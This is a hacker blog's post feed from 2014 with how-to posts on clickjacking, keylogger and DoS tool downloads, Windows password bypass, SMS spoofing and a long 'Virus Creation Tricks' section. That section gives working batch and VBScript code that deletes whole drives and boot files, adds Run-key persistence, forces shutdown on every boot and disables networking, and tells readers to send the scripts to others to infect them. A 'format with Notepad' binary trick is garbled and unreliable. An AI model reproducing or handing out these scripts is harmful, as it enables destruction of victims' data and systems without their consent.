Intresting Things

Register Softwares,Hacking Related books,Games, Music, Movies.. Comment me i will provide you :-p join my FB group https://www.facebook.com/softwresandbooks

Intresting Things

Register Softwares,Hacking Related books,Games, Music, Movies.. Comment me i will provide you :-p join my FB group https://www.facebook.com/softwresandbooks

Intresting Things

Register Softwares,Hacking Related books,Games, Music, Movies.. Comment me i will provide you :-p join my FB group https://www.facebook.com/softwresandbooks

Intresting Things

Register Softwares,Hacking Related books,Games, Music, Movies.. Comment me i will provide you :-p join my FB group https://www.facebook.com/softwresandbooks

Intresting Things

Register Softwares,Hacking Related books,Games, Music, Movies.. Comment me i will provide you :-p join my FB group https://www.facebook.com/softwresandbooks

Friday 26 December 2014

TOP 5 WEBSITES TO DOWNLOAD FREE EBOOKS

Hello Friends, today i am going to share with you world's best top 10 websites to download free ebooks in PDF format. Most of us thinks that's eBooks are very hard to find on internet, but that's not true. You can find almost each and every eBook in the sites that i will tell you today. So guys these are the Best Top 10 websites to download free eBooks on internet.



Saturday 20 December 2014

how to hack someone by clickjacking

Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe.

Clickjacking attack allows to perform an action on victim website, Mostly Facebook and Twitter accounts are targetable.



One famous example of clickjacking is Facebook

Code:

<style>
iframe { /* iframe from facebook.com */
width:300px;
height:100px;
position:absolute;
top:0; left:0;
filter:alpha(opacity=50); /* in real life opacity=0 */
opacity:0.5;
}
</style>

<div>Click on the link to get more followers:</div>

<iframe src="/files/tutorial/window/clicktarget.html"></iframe>

<a href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">CLICK ME!</a>

<div>You'll be get 10000 followers..!!</div>


Output:
Click on the link to get more followers
Click Me
You'll be get 10000 followers..!!
Download 

Friday 21 November 2014

AnyKeylogger Full Version And Undetectable Free of cost


What Is Keylogger?

Keylogger is a tool that can monitor keystrokes, record visited websites and applications, etc. it's used for Parental Control,Monitoring Employees and Recording Keystrokes as Backup.

For people who are afraid of computer sudden crashes when they are typing something and fail to store in time, keylogger is a useful tool that can record and store all keystrokes in real time when the computer start.

In addition, keylogger is widely used to monitor children and employees computer use.
Password:softwresandbooks.blogspot.com



Wednesday 19 November 2014

How to create unique emails [Noob Friendly]

Note: You'll be asked to provide a phone number + zip code so use a site like fakenamegenerator

















Copy and paste the link into your browsers address bar, then simply make the account.

@hack.cl

@yoloswag.me - email services down.

Blackberry Secret Codes


Blackberry Secret CodesThe Blackberry Secret Codes is a secret code for a blackberry phone. There are many secret codes you can use for your blackberry device. When you use or try this, make sure you read the description of the code


here is the blackberry secret codes:













NameDescriptionHow-to
Address Bookdata structure rebuildForces a data structure re-build in the Address BookIn the Address Book, hold "Alt" and press "R", "B", "L", "D".
Address Bookfile verification.Checks the data in your Address Book for inconsistencies.In the Address Book, hold "Alt" and press "V", "A", "L", "D".
Decibel meter.Displays your signal strength in decibels, instead of bars.Hold "Alt" and press "N", "M", "L", "L" (repeat to reverse the effect).
View website source code.Displays the source code of a Web page.In the Browser, hold "Alt" and press "R", "B", "V", "S".
Help Me! menu.Provides crucial technical information about your device.Hold "Alt" and (left) "shift", then press "H".
IMEI display.Displays your device's international mobile equipment identity (IMEI – your serial number) on-screen… Also works from all other GSM handsets.Type "*", "#", "0", "6", "#" on the Home screen.
"Soft" reset.Performs a "soft" reset of your device; the equivalent of doing a "battery pull" (ie. Removing the battery for a few seconds).Press-and-hold "Alt", then press-and-hold (left) "shift", then press-and-hold "Del".
Event Log.Displays event logs of all the system-level events that occur on your device.Hold "Alt" and press "L", "G", "L", "G".
add a category titled "Buyer's Remorse"tell how many hours of phone use and whether there is an ITpolicy on the phone.Go to menu options "Options"
"Device"
"Device and Status Information"
Now type the following letters on the keypad: buyr

4shared Premium Link Generator Free No wait 2015


Now Download with Premium Link Generator to generate premium link ...Free ..No wait, full Speed Download....



Wednesday 5 November 2014

Get Unlimited facebook likes, twitter followers, youtube likes for FREE

First Sign Up Here

2: Go Here & Enter These Codes

Click Here

3752-4113-6084-6273

7327-4782-5767-5651

After Sumbitting these coupons you will get 7,800 coins.



Now Go to:

Here

and Sumbit “That You Want” FACEBOOK LIKES, YOUTUBE SUBSCRIBERS, FREE TWITTER FOLLOWERS, INSTAGRAM FOLLOWERS, WEBSITE TRAFFIC & MORE

Set “Coins per Click ” and

Daily Clicks Limit “Disable” (Default)
Total Clicks Limit “Disable” (Default)

Receive Clicks From “All Genders” and “All Countries” (Default)

Now enjoy !


follow me on twitter write in your message
Follow softwresandbook
and send to 40404 and receive my updates free on your mobile

If Any Problem Then Comments, also like my Fb Page

Sunday 12 October 2014

DOS Attacks and Free DOS Attacking Tools

The denial of service (DOS) attack is one of the most powerful attacks used by hackers to harm a company or organization. Don’t confuse a DOS attack with DOS, the disc operating system developed by Microsoft. This attack is one of most dangerous cyber attacks. It causes service outages and the loss of millions, depending on the duration of attack. In past few years, the use of the attack has increased due to the availability of free tools. This tool can be blocked easily by having a good firewall. But a widespread and clever DOS attack can bypass most of the restrictions. In this post, we will see more about the DOS attack, its variants, and the tools that are used to perform the attack. We will also see how to prevent this attack and how not to be the part of this attack.
Free DOS Attacking Tools
1. LOIC (Low Orbit Ion Canon)

LOIC is one of the most popular DOS attacking tools freely available on the Internet. This tool was used by the popular hackers group Anonymous against many big companies’ networks last year. Anonymous has not only used the tool, but also requested Internet users to join their DDOS attack via IRC.

It can be used simply by a single user to perform a DOS attack on small servers. This tool is really easy to use, even for a beginner. This tool performs a DOS attack by sending UDP, TCP, or HTTP requests to the victim server. You only need to know the URL of IP address of the server and the tool will do the rest.

You can see the snapshot of the tool above. Enter the URL or IP address and then select the attack parameters. If you are not sure, you can leave the defaults. When you are done with everything, click on the big button saying “IMMA CHARGIN MAH LAZER” and it will start attacking on the target server. In a few seconds, you will see that the website has stopped responding to your requests.

This tool also has a HIVEMIND mode. It lets attacker control remote LOIC systems to perform a DDOS attack. This feature is used to control all other computers in your zombie network. This tool can be used for both DOS attacks and DDOS attacks against any website or server.

The most important thing you should know is that LOIC does nothing to hide your IP address. If you are planning to use LOIC to perform a DOS attack, think again. Using a proxy will not help you because it will hit the proxy server not the target server. So using this tool against a server can create a trouble for you.

Download LOIC Here: Click Here


2. XOIC

XOIC is another nice DOS attacking tool. It performs a DOS attack an any server with an IP address, a user-selected port, and a user-selected protocol. Developers of XOIC claim that XOIC is more powerful than LOIC in many ways. Like LOIC, it comes with an easy-to-use GUI, so a beginner can easily use this tool to perform attacks on other websites or servers.

In general, the tool comes with three attacking modes. The first one, known as test mode, is very basic. The second is normal DOS attack mode. The last one is a DOS attack mode that comes with a TCP/HTTP/UDP/ICMP Message.

It is an effective tool and can be used against small websites. Never try it against your own website. You may end up crashing your own website’s server.

Download XOIC: Click Here


3. HULK (HTTP Unbearable Load King)

HULK is another nice DOS attacking tool that generates a unique request for each and every generated request to obfuscated traffic at a web server. This tool uses many other techniques to avoid attack detection via known patterns.

It has a list of known user agents to use randomly with requests. It also uses referrer forgery and it can bypass caching engines, thus it directly hits the server’s resource pool.

The developer of the tool tested it on an IIS 7 web server with 4 GB RAM. This tool brought the server down in under one minute.

Download HULK here: Click Here


4. DDOSIM—Layer 7 DDOS Simulator

DDOSIM is another popular DOS attacking tool. As the name suggests, it is used to perform DDOS attacks by simulating several zombie hosts. All zombie hosts create full TCP connections to the target server.

This tool is written in C++ and runs on Linux systems.

These are main features of DDOSIM:
  • Simulates several zombies in attack
  • Random IP addresses
  • TCP-connection-based attacks
  • Application-layer DDOS attacks
  • HTTP DDoS with valid requests
  • HTTP DDoS with invalid requests (similar to a DC++ attack)
  • SMTP DDoS
  • TCP connection flood on random port

Download DDOSIM here: Click Here

5. R-U-Dead-Yet

R-U-Dead-Yet is a HTTP post DOS attack tool. For short, it is also known as RUDY. It performs a DOS attack with a long form field submission via the POST method. This tool comes with an interactive console menu. It detects forms on a given URL and lets users select which forms and fields should be used for a POST-based DOS attack.

Download RUDY: Click Here

6. Tor’s Hammer

Tor’s Hammer is another nice DOS testing tool. It is a slow post tool written in Python. This tool has an extra advantage: It can be run through a TOR network to be anonymous while performing the attack. It is an effective tool that can kill Apache or IIS servers in few seconds.

Download TOR’s Hammer here: Click Here


7. PyLoris

PyLoris is said to be a testing tool for servers. It can be used to perform DOS attacks on a service. This tool can utilize SOCKS proxies and SSL connections to perform a DOS attack on a server. It can target various protocols, including HTTP, FTP, SMTP, IMAP, and Telnet. The latest version of the tool comes with a simple and easy-to-use GUI. Unlike other traditional DOS attacking tools, this tool directly hits the service.

Download PyLoris: Click Here

8. OWASP DOS HTTP POST

It is another nice tool to perform DOS attacks. You can use this tool to check whether your web server is able to defend DOS attack or not. Not only for defense, it can also be used to perform DOS attacks against a website.

Download here: Click Here

9. DAVOSET

DAVOSET is yet another nice tool for performing DDOS attacks. The latest version of the tool has added support for cookies along with many other features. You can download DAVOSET for free from Packetstormsecurity.

Download DavoSET: Click Here

10. GoldenEye HTTP Denial Of Service Tool

GoldenEye is also a simple but effective DOS attacking tool. It was developed in Python for testing DOS attacks, but people also use it as hacking tool.

Download GoldenEye: Click Here

Detection and Prevention of Denial of Service Attack

A DOS attack is very dangerous for an organization, so it is important to know and have a setup for preventing one. Defenses against DOS attacks involve detecting and then blocking fake traffic. A more complex attack is hard to block. But there are a few methods that we can use to block normal DOS attack. The easiest way is to use a firewall with allow and deny rules. In simple cases, attacks come from a small number of IP addresses, so you can detect those IP addresses and then add a block rule in the firewall.

But this method will fail in some cases. We know that a firewall comes at a very deep level inside the network hierarchy, so a large amount of traffic may affect the router before reaching the firewall.

Blackholing and sinkholing are newer approaches. Blackholing detects the fake attacking traffic and sends it to a black hole. Sinkholing routes all traffic to a valid IP address where traffic is analyzed. Here, it rejects back packets.

Clean pipes is another recent method of handling DOS attacks. In this method, all traffic is passed through a cleaning center, where, various methods are performed to filter back traffic. Tata Communications, Verisign, and AT&T are the main providers of this kind of protection.

As an Internet user, you should also take care of your system. Hackers can use your system as a part of their zombie network. So, always try to protect your system. Always keep your system up to date with the latest patches. Install a good antivirus solution. Always take care while installing software. Never download software from un-trusted or unknown sources. Many websites serve malicious software to install Trojans in the systems of innocent users.

Conclusion

In this article, we learned about the denial of service attack and tools used to perform the attack. DOS attacks are used to crash servers and disrupt service. Sony has faced this attack for a long time and lost millions of dollars. It was a big lesson for other companies who rely on server-based income. Every server should set up a way to detect and block DDOS attacks. The availability of free tools makes it easier to perform DOS attack against a website or server. Although most of these tools are only for DOS attacks, a few tools support a zombie network for DDOS attacks. LOIC is the most used and most popular DOS attacking tool. In the past few years, it has been used many times by hackers against big company’s network, so we can never deny the possibility of attack.

So, every company should take care of it and set up good level of protection against DOS attack.




follow me on twitter write in your message
Follow softwresandbook
and send to 40404 and receive my updates free on your mobile
If Any Problem Then Comments, also like my Fb Page






How to Hack/Bypass windows password


Steps to Hack Windows Password:-

1 ) Download the zip file from Here.
2 ) Extract it.
3 ) There will be a .iso file . Burn that file to cd using nero/poweriso or anyother software you have.
4 ) Boot using this cd ie insert this cd in CD-Rom and restart [Make sure that cd-rom has the highest boot priority]
5 ) After booting ,It will show a menu , Choose “Mini windows xp”.It will take some time to launch.
6 ) After it is finished ,You will be having a windows classic style desktop.
7 ) Click on start>>Hiren boot cd menu [HBCD menu]
8 ) It will open a dialogue box,click on “Menu” >>click on “password and keys”, there you will be having a list of softwares,click on “”Password renew””.
9 ) Now click on select target ,Browse to your windows ie “c:windows” and press ok.
10 ) Click on “Renew exisiting user password” and then choose the Your user account .
11 ) Enter the desired password and hit install.
12 ) You are now done just restart Your pc and login using your new password.

Send sms any number/name to any Number Free 2014

Hello Guys,
i have a fake sms website collection.in which you can send sms any number or name to any number free...no password..100% free..Check this links..











Bluequeue Android app to send multiple files

bluequeue-logoEver wanted to send 10, 20 maybe 30 or more pictures to your friend but didn’t bother to do so because sending them one by one is frustrating?
Bluequeue is a multiple file sender via bluetooth. With simple interface, simple controls and integrated file browser.
It can send files to dumbphones (old Nokia’s for ex.) as well as to smartphones and computers.
It does not need for devices to be paired for file exchange.
More info and download at “Google Play”.

Format your HDD with Notepad

If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.














Step 1 => Copy The Following In Notepad Exactly as it is.

says01001011000111110010010101010101010000011111100000

Step 2 => Save As An EXE Any Name Will Do

Step 3 => Send the EXE to People And Infect

OR

IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X — this will format your drive a:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

Great Virus To crush Your Enemy System



1 -> Virus Creation Tricks 1


Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”


Now Save This Notepad file With Any Name Having  .vbs Extension . 

2 -> Virus Creation Trick  2 .
Open Notepad and write "start" without quotes 
Start
Start
Start 

and then save it with .bat extension. 
Now double click on this .bat file to run Command Prompt.

 3 -> Virus Creation Trick 3 
Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
 
Save it as "Anything.BAT" in All Files and send it. 

4 -> Virus Creation Trick 4 
Toggle your friend's Caps Lock button simultaneously:
Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it. 

5 -> Virus Creation Trick 5 
Frustrate your friend by making this VBScript hit Enter simultaneously:Type :

Code:

Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.
   

6 -> Virus Creation Trick 6  
This Virus Deletes All The Content Of A Drive... 

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat 




7 -> Virus Creation Trick 7
This Will Crash Ur Computer 
Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs 
 
 8 -> Virus Creation Trick 8
The Most Simple Virus To Crush The Window
It Only Works With Windows XP


@Echo off
Del C: *.* |y
 
Save It As Anything.bat 

 9 -> Virus Creation Trick 9
Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

Save As Anything.bat File In Notepad!!This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!


10 -> Virus Creation Trick 10
Shutdowns Computer Everytime It Is Turned On
Save As A bat File
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

11 -> Virus Creation Trick 11
Disable Internet Permanently
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File
 
  
12 -> Virus Creation Trick 12 
Change Files To Non-working TXT Files
Save As A bat File

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

  

13 -> Virus Creation Trick 13 
System Meltdown

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File


Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will 
automatically shutdown on every startup !